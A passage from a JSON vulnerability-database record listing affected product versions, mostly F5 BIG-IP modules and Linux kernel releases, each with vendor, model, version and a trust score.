        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip asm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.2"
      },
      {
        "model": "big-ip pem hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip dns hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "big-ip analytics hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip ltm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.9.8"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.3"
      },
      {
        "model": "big-ip asm hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.42"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.15"
      },
      {
        "model": "big-ip aam hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.30"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.38.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.14"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.3"
      },
      {
        "model": "big-ip asm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.66.204.442"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.3.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.3"
      },
      {
        "model": "big-ip gtm hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "big-ip analytics",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "big-iq cloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.9"
      },
      {
        "model": "big-ip ltm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.41"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.26"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.4"
      },
      {
        "model": "big-ip websafe hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.31"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.4"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.39"
      },
      {
        "model": "big-iq centralized management",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.17.4"
      },
      {
        "model": "big-ip ltm hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-ip afm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.5"
      },
      {
        "model": "big-ip link controller build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.40.1.256"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.58"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.22"
      },
      {
        "model": "big-ip gtm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "big-ip aam hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-ip link controller hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.10"
      },
      {
        "model": "big-ip analytics hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip link controller hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "big-iq adc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.5"
      },
      {
        "model": "big-ip asm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip aam hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-iq cloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.2"
      },
      {
        "model": "big-ip aam hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.12"
      },
      {
        "model": "big-ip analytics hf9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-ip afm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.26.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.7"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.1"
      },
      {
        "model": "big-ip websafe hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.6"
      },
      {
        "model": "big-ip link controller hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "big-ip gtm hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.4.1"
      },
      {
        "model": "big-ip link controller hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-ip asm hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.13"
      },
      {
        "model": "big-ip gtm hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.5"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "big-ip afm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.40.1.256"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.72"
      },
      {
        "model": "big-ip apm hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.16"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.51"
      },
      {
        "model": "big-ip psm hf9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-ip asm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "big-ip asm hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.38"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.37.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.52"
      },
      {
        "model": "big-ip wom",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.1.8"
      },
      {
        "model": "big-ip dns hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.18.11"
      },
      {
        "model": "big-ip analytics hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.46"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.1"
      },
      {
        "model": "big-ip analytics build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.66.204.442"
      },
      {
        "model": "big-ip aam hf4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip link controller hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "big-ip asm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.1"
      },
      {
        "model": "big-iq cloud and orchestration",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "1.0"
      },
      {
        "model": "big-ip apm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.7"
      },
      {
        "model": "big-ip analytics hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25"
      },
      {
        "model": "big-ip asm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.28.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.5"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.28"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.30.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.52"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip gtm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.40.1.256"
      },
      {
        "model": "big-ip ltm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.66.204.442"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.38"
      },
      {
        "model": "big-ip aam build 685-hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.3"
      },
      {
        "model": "big-ip ltm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.0"
      },
      {
        "model": "enterprise linux server optional",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "big-ip gtm build 685-hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.51"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.86"
      },
      {
        "model": "big-ip ltm hf9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-ip ltm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip edge gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.19.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.29"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.25.10"
      },
      {
        "model": "big-ip apm hf9",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.21"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.2"
      },
      {
        "model": "big-ip ltm hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.37"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.11"
      },
      {
        "model": "big-ip asm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.01.14.628"
      },
      {
        "model": "big-ip afm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.14.54"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.12"
      },
      {
        "model": "big-ip apm hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.2"
      },
      {
        "model": "big-ip websafe hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2519"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.60"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.27"
      },
      {
        "model": "big-ip asm hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "big-ip pem",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.15"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.6.1"
      },
      {
        "model": "big-ip aam",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.2"
      },
      {
        "model": "big-ip aam hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.12.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.13.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.2"
      },
      {
        "model": "big-ip asm hf7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.53"
      },
      {
        "model": "big-ip aam hf1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.5.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.19.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.41"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.10.20"
      },
      {
        "model": "big-ip apm build",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.66.204.442"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.5.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "big-ip pem hf5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.0"
      },
      {
        "model": "big-ip analytics hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "big-ip link controller",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.58"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.4.15"
      },
      {
        "model": "big-ip gtm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.6.1"
      },
      {
        "model": "big-ip apm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.2"
      },
      {
        "model": "big-ip webaccelerator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.4"
      },
      {
        "model": "big-ip psm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.0.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.49"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.5.5"
      },
      {
        "model": "big-ip ltm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "10.2.3"
      },
      {
        "model": "big-ip asm build 685-hf10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.7.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.1"
      },
      {
        "model": "big-ip analytics hf3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.2.72"
      },
      {
        "model": "big-iq security",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "3.8.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.21.6"
      },
      {
        "model": "big-ip psm hf8",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "11.4"
      },
      {
        "model": "big-ip pem hf2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
        "version": "12.0"
      },
      {
        "model": "big-ip dns",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "f5",
